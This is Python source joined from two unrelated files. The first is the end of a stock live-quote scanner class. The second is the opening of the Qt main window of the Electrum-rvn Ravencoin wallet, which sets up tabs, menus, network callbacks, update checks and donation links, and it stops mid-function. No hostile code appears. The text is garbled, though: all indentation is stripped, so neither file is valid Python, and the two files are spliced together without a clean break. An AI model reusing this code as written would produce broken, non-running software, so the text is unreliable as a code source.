__all__ = ['quoteScanner']
NAME_LIST = ['Symbol', 'Name', 'ISIN']
QUOTE_LIST = ['Last Updated', 'Prev Close', 'Last Trade Price','Change','% Change', 'Avg. Price', 'Upper Band','Lower Band', 'Adjusted Price']
OHLC_LIST = ['Open', 'High', 'Low', 'Close']
WK52_LIST = ['52 Wk High', '52 Wk Low']
VOLUME_LIST = ['Quantity Traded', 'Total Traded Volume', 'Total Traded Value', 'Delivery Volume', '% Delivery', 'Total Buy Qty.', 'Total Sell Qty.', 'FF Market Cap(cr)', 'Face Value', 'Buy - Sell', 'Free Float']
PIPELINE_LIST = ['Bid Quantity', 'Bid Price', 'Offer_Quantity', 'Offer_Price']
class quoteScanner(baseScanner):
def __init__(self, scanner_type, stocks=[], indicator=None, background=False):
super().__init__(scanner_type,stocks,indicator, background)
self.response_type = ResponseType.Quote
@tracelog
def scan(self, symbol, general, ohlc, wk52, volume, orderbook, background):
global RUN_IN_BACKGROUND
try:
if background:
b = threading.Thread(name='live_quote_background', target=self.live_quote_background, args=[symbol, general, ohlc, wk52, volume, orderbook], daemon=True)
b.start()
b.join()
else:
orgdata, df = get_live_quote(symbol, general, ohlc, wk52, volume, orderbook)
self.format_beautified(orgdata, general, ohlc, wk52, volume, orderbook)
except Exception as e:
RUN_IN_BACKGROUND = False
default_logger().debug(e, exc_info=True)
click.secho('Failed to fetch live quote', fg='red', nl=True)
return
except SystemExit:
RUN_IN_BACKGROUND = False
return
@tracelog
def live_quote_background(self, symbol, general, ohlc, wk52, volume, orderbook, terminate_after_iter=0, wait_time=resources.scanner().background_scan_frequency_quotes):
global RUN_IN_BACKGROUND
RUN_IN_BACKGROUND = True
iteration = 0
while RUN_IN_BACKGROUND:
iteration = iteration + 1
if terminate_after_iter > 0 and iteration >= terminate_after_iter:
RUN_IN_BACKGROUND = False
break
result = get_quote(symbol)
self.format_beautified(result, general, ohlc, wk52, volume, orderbook)
time.sleep(wait_time)
click.secho('Finished all iterations of scanning live quotes.', fg='green', nl=True)
return iteration
def format_beautified(self, orgdata, general, ohlc, wk52, volume, orderbook):
primary, name_data, quote_data, ohlc_data, wk52_data, volume_data, pipeline_data = get_data_list(orgdata)
frames = []
if general:
frames = self.add_frame(frames, name_data, NAME_LIST)
frames = self.add_frame(frames, quote_data, QUOTE_LIST)
if ohlc:
frames = self.add_frame(frames, ohlc_data, OHLC_LIST)
if wk52:
frames = self.add_frame(frames, wk52_data, WK52_LIST)
if volume:
frames = self.add_frame(frames, volume_data, VOLUME_LIST)
click.secho('------------------------------------------', fg='green', nl=True)
print('As of {}\n'.format(IST_datetime()))
click.echo(pd.concat(frames).to_string(index=True))
if orderbook:
dfpipeline = self.formatted_dataframe(pipeline_data, PIPELINE_LIST, indices=False)
print('\n')
click.echo(dfpipeline.to_string(index=False))
click.secho('------------------------------------------', fg='red', nl=True)
def format_column(self, columnname, width):
return columnname.ljust(width) + '|'
def add_frame(self, frames, list_data, column_names, should_transpose=True):
df = self.formatted_dataframe(list_data, column_names)
df = human_readable_df(df)
frames.append(df.transpose() if should_transpose else df)
return frames
def formatted_dataframe(self, list_data, column_names, indices=True):
columns =[]
for column in column_names:
columns.append(self.format_column(column,20))
if indices:
df = pd.DataFrame(list_data, columns = columns, index = [''])
else:
df = pd.DataFrame(list_data, columns = columns)
return df
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, ravencoin, commands,
coinchooser, paymentrequest)
from electrum.ravencoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidRavencoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 1))
self.asset_blacklist = config.get('asset_blacklist', [])
self.asset_whitelist = config.get('asset_whitelist', [])
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.assets_tab = self.create_assets_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.assets_tab, read_QIcon("tab_assets.png"), _('Assets'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized", False):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
# TODO: asset reissues
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
if not self.isMaximized():
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
if not self.isMaximized():
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-raven Testnet" if constants.net.TESTNET else "Electrum-raven"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Ravencoin with it."),
_("Make sure you own the seed phrase or the private keys, before you request Ravencoin to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Ravencoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addAction(_("&Log viewer"), self.logview_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction("&RVN Electrum Wiki", lambda: webopen("https://raven.wiki/wiki/Electrum"))
help_menu.addAction("&GetRavencoin.org", lambda: webopen("https://GetRavencoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
help_menu.addAction(_("&Donate to developer"), self.donate_to_dev)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('raven:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def donate_to_dev(self):
self.pay_to_URI('raven:RDRczYCUeLwXVnrKMYHKYLS1oPc9aCxGnG?message=Developer donation')
def show_about(self):
QMessageBox.about(self, "Electrum-rvn",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Ravencoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Ravencoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v['RVN']
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v['RVN'])))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-rvn", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-rvn", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
